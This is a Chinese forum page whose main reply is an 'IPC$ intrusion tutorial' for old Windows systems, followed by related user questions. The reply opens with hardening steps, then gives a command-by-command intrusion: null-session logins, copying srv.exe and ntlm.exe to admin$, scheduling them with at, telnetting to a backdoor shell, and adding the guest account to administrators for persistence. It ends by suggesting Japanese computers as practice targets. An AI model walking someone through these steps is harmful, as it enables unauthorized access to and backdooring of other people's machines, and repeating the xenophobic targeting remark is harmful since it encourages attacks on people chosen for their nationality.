ipc$入侵教程終結(jié)版

打醬油男一號(hào) 2013-10-26 09:51:49 453 瀏覽

參與評(píng)論

評(píng)論

登錄后參與評(píng)論

全部評(píng)論(1條)

靳薪善 2013-10-27 00:00:00

?如何防范ipc$入侵　　1禁止空連接進(jìn)行枚舉(此操作并不能阻止空連接的建立，引自《解剖win2000下的空會(huì)話》) 　　首先運(yùn)行regedit，找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設(shè)置為2的話，有一些問題會(huì)發(fā)生，比如一些WIN的服務(wù)出現(xiàn)問題等等) 　　2禁止默認(rèn)共享　　1)察看本地共享資源　　運(yùn)行-cmd-輸入net share 　　2)刪除共享(每次輸入一個(gè)) 　　net share ipc$ /delete 　　net share admin$ /delete 　　net share c$ /delete 　　net share d$ /delete(如果有e，f，……可以繼續(xù)刪除) 　　3)停止server服務(wù) 　　net stop server /y (重新啟動(dòng)后server服務(wù)會(huì)重新開啟) 　　4)修改注冊(cè)表　　運(yùn)行-regedit 　　server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。　　pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。　　如果上面所說的主鍵不存在，就新建(右擊-新建-雙字節(jié)值)一個(gè)主健再改鍵值。　　3關(guān)閉ipc$和默認(rèn)共享依賴的服務(wù):lanmanserver即server服務(wù) 　　控制面板-管理工具-服務(wù)-找到server服務(wù)(右擊)-屬性-常規(guī)-啟動(dòng)類型-已禁用　　4安裝防火墻(選中相關(guān)設(shè)置)，或者端口過濾(濾掉139，445等)，或者用新版本的優(yōu)化大師　　5設(shè)置復(fù)雜密碼，防止通過ipc$窮舉密碼　八相關(guān)命令　　1)建立空連接: 　　net use \\IP\ipc$ "" /user:""????(一定要注意:這一行命令中包含了3個(gè)空格) 　　2)建立非空連接: 　　net use \\IP\ipc$ "用戶名" /user:"密碼"?? (同樣有3個(gè)空格) 　　3)映射默認(rèn)共享: 　　net use z: \\IP\c$ "密碼" /user:"用戶名"??? (即可將對(duì)方的c盤映射為自己的z盤，其他盤類推) 　　如果已經(jīng)和目標(biāo)建立了ipc$，則可以直接用IP+盤符+$訪問，具體命令 net use z: \\IP\c$ 　　4)刪除一個(gè)ipc$連接　　net use \\IP\ipc$ /del 　　5)刪除共享映射　　net use c: /del 刪除映射的c盤，其他盤類推　　net use * /del 刪除全部，會(huì)有提示要求按y確認(rèn) 　　九經(jīng)典入侵模式　　這個(gè)入侵模式太經(jīng)典了，大部分ipc教程都有介紹，我也就拿過來引用了，在此感謝原創(chuàng)作者!(不知道是哪位前輩) 　　1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 　　這是用《流光》掃到的用戶名是administrators，密碼為"空"的IP地址(空口令?哇，運(yùn)氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個(gè)連接，因?yàn)槊艽a為"空"，所以diyi個(gè)引號(hào)處就不用輸入，后面一個(gè)雙引號(hào)里的是用戶名，輸入administrators，命令即可成功完成。　　2. C:\>copy srv.exe \\127.0.0.1\admin$ 　　先復(fù)制srv.exe上去，在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復(fù)制到什么地方去了)。　　3. C:\>net time \\127.0.0.1 　　查查時(shí)間，發(fā)現(xiàn)127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:00，命令成功完成。　　4. C:\>at \\127.0.0.1 11:05 srv.exe 　　用at命令啟動(dòng)srv.exe吧(這里設(shè)置的時(shí)間要比主機(jī)時(shí)間快，不然你怎么啟動(dòng)啊，呵呵!) 　　5. C:\>net time \\127.0.0.1 　　再查查到時(shí)間沒有?如果127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:05，那就準(zhǔn)備開始下面的命令。　　6. C:\>telnet 127.0.0.1 99 　　這里會(huì)用到Telnet命令吧，注意端口是99。Telnet默認(rèn)的是23端口，但是我們使用的是SRV在對(duì)方計(jì)算機(jī)中為我們建立一個(gè)99端口的Shell。　　雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活!所以我們打算建立一個(gè)Telnet服務(wù)!這就要用到ntlm了　　7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 　　用Copy命令把ntlm.exe上傳到主機(jī)上(ntlm.exe也是在《流光》的Tools目錄中)。　　8. C:\WINNT\system32>ntlm 　　輸入ntlm啟動(dòng)(這里的C:\WINNT\system32>指的是對(duì)方計(jì)算機(jī)，運(yùn)行ntlm其實(shí)是讓這個(gè)程序在對(duì)方計(jì)算機(jī)上運(yùn)行)。當(dāng)出現(xiàn)"DONE"的時(shí)候，就說明已經(jīng)啟動(dòng)正常。然后使用"net start telnet"來開啟Telnet服務(wù)! 　　9. Telnet 127.0.0.1，接著輸入用戶名與密碼就進(jìn)入對(duì)方了，操作就像在DOS上操作一樣簡(jiǎn)單!(然后你想做什么?想做什么就做什么吧，哈哈) 　　為了以防萬一，我們?cè)侔裧uest激活加到管理組?? 　　10. C:\>net user guest /active:yes 　　將對(duì)方的Guest用戶激活　　11. C:\>net user guest 1234 　　將Guest的密碼改為1234，或者你要設(shè)定的密碼　　12. C:\>net localgroup administrators guest /add 　　將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改，guest帳號(hào)沒改變的話，下次我們可以用guest再次訪問這臺(tái)計(jì)算機(jī)) 　　十總結(jié): 　　關(guān)于ipc入侵就說這么多了，覺得已經(jīng)夠詳細(xì)了，如果有不準(zhǔn)確的地方，希望能與大家討論. 　　Z后，希望大家不要隨便入侵，我寫這篇文章的目的是想解答大家的疑惑，并不是鼓勵(lì)大家隨便的入侵，如果你非想試一下，建議拿小日本的機(jī)子開練(什么?為什么?因?yàn)槲矣憛捜毡?，沒別的)

贊(5)

回復(fù)(0)

評(píng)論

評(píng)論
登錄后參與評(píng)論

登錄或新用戶注冊(cè)

微信登錄
密碼登錄
短信登錄

請(qǐng)用手機(jī)微信掃描下方二維碼
快速登錄或注冊(cè)新賬號(hào)

微信掃碼，手機(jī)電腦聯(lián)動(dòng)

注冊(cè)登錄即表示同意《儀器網(wǎng)服務(wù)條款》和《隱私協(xié)議》

熱門問答

ipc$入侵教程終結(jié)版:

IPC$入侵的如何防范ipc$入侵:

ipc入侵請(qǐng)教``: 會(huì)記錄新的網(wǎng)絡(luò)連接。狀態(tài) 本地遠(yuǎn)程網(wǎng)絡(luò) ------------------------------------------------------------------------------- OK \\172.16.1.11\IPC$ Microsoft Windows Network ... 會(huì)記錄新的網(wǎng)絡(luò)連接。狀態(tài) 本地遠(yuǎn)程網(wǎng)絡(luò) ------------------------------------------------------------------------------- OK \\172.16.1.11\IPC$ Microsoft Windows Network 命令成功完成。 C:\>net use z: \\172.16.1.1\c$ 發(fā)生系統(tǒng)錯(cuò)誤 67。找不到網(wǎng)絡(luò)名。 C:\> 為什么映射不了``請(qǐng)高手解答`` 展開

IPC入侵問題: 到底怎么IPC入侵啊誰(shuí)能講的詳細(xì)些 net use $">\\IP\ipc$ "admin" /user:"111" 我這樣打的命令好象錯(cuò)了誰(shuí)知道怎么弄的啊找不到網(wǎng)絡(luò)名錯(cuò)誤代碼67

怎么ipc$入侵: 知道對(duì)方IP 知道用戶密碼對(duì)方要開什么服務(wù)嗎怎么開的在哪里開的

如何防范ipc$入侵:

ipc$入侵，關(guān)于TELNET服務(wù)如果沒有開啟能不能入侵: 我用兩臺(tái)電腦做實(shí)驗(yàn)，用ipc$入侵，可是默認(rèn)目錄明明是共享的，就是映謝不了``經(jīng)常提示系統(tǒng)發(fā)生錯(cuò)誤67，找不到網(wǎng)絡(luò)名，這是為什么了，

掃描用戶名，密碼和IPC$入侵: 我要掃描一個(gè)IP地址的用戶名和密碼，用什么軟件比較好？流光5.0我用過了，總是掃描不到，有更好的軟件嗎？關(guān)于IPC$入侵和系統(tǒng)有關(guān)嗎？ XP系統(tǒng)能進(jìn)行IPC$入侵嗎

IPC入侵的基本步驟是什么:

關(guān)于局域網(wǎng)IPC入侵XP方法?: 我是菜鳥，大家?guī)臀谊P(guān)于局域網(wǎng)IPC入侵XP方法? 重謝！不要復(fù)制！

用IPC$入侵一臺(tái)PC，win7的: 我入侵了一臺(tái)有密碼的，卻對(duì)一臺(tái)沒有密碼的沒有辦法，因?yàn)槊看卧L問，他的密碼是空的，所以沒有輸入，但是系統(tǒng)默認(rèn)不輸入密碼就訪問失敗，輸密碼時(shí)我直接回車也不行，。。。。net use z: \\ip\ "" /user:XXX，失敗。。；。。

IPC連接入侵需要的命令都有哪些？:

利用IPC$通道入侵現(xiàn)在還能用么？: 試著通過IPC$入侵過一段時(shí)間，總是出現(xiàn)各種錯(cuò)誤，不論在局域網(wǎng)還是寬帶。掃描不到139開著的機(jī)器，或者得到用戶名密碼后不能連接等。。有些不知所措了

如何防止XP系統(tǒng)中的IPC$共享入侵?。?！: 如題

如何入侵能建立IPC$空連接的主機(jī):

做IPC共享入侵實(shí)驗(yàn)提示67錯(cuò)誤怎么解決: ping到目標(biāo)windows20000主機(jī)是ping的通的然后我用net use \\目標(biāo)ip\ipc$ "111" /user:"Administrator"命令嘗試進(jìn)行連接提示67錯(cuò)誤找不到網(wǎng)絡(luò)名 ipc$不是默認(rèn)開啟的么

怎么樣用ipc遠(yuǎn)程入侵局域網(wǎng)內(nèi)的機(jī)子，請(qǐng)看問題補(bǔ)充....: （我的機(jī)子不在這個(gè)局域網(wǎng)是單機(jī)撥號(hào)上網(wǎng)的，我可以設(shè)置局域網(wǎng)路由和被入侵的機(jī)子）或者有什麼方法可以在線修改他的access數(shù)據(jù)庫(kù)的方法都可以

用正確的用戶名跟密碼來IPC入侵時(shí)提示錯(cuò)誤怎么回事: 是不是對(duì)方機(jī)器哪個(gè)服務(wù)沒開

用ipc$入侵的時(shí)候總是提示：發(fā)生系統(tǒng)錯(cuò)誤53：找不到網(wǎng)絡(luò)途徑。: 我是用我家的臺(tái)式機(jī)入侵我家的筆記本，都是接著同一個(gè)路由器的，用nbtstat命令也可以看到另一臺(tái)電腦的狀態(tài)，但每次入侵都提示錯(cuò)誤。

4月突出貢獻(xiàn)榜

推薦主頁(yè)

ipc$入侵教程終結(jié)版

聯(lián)系我們

關(guān)注我們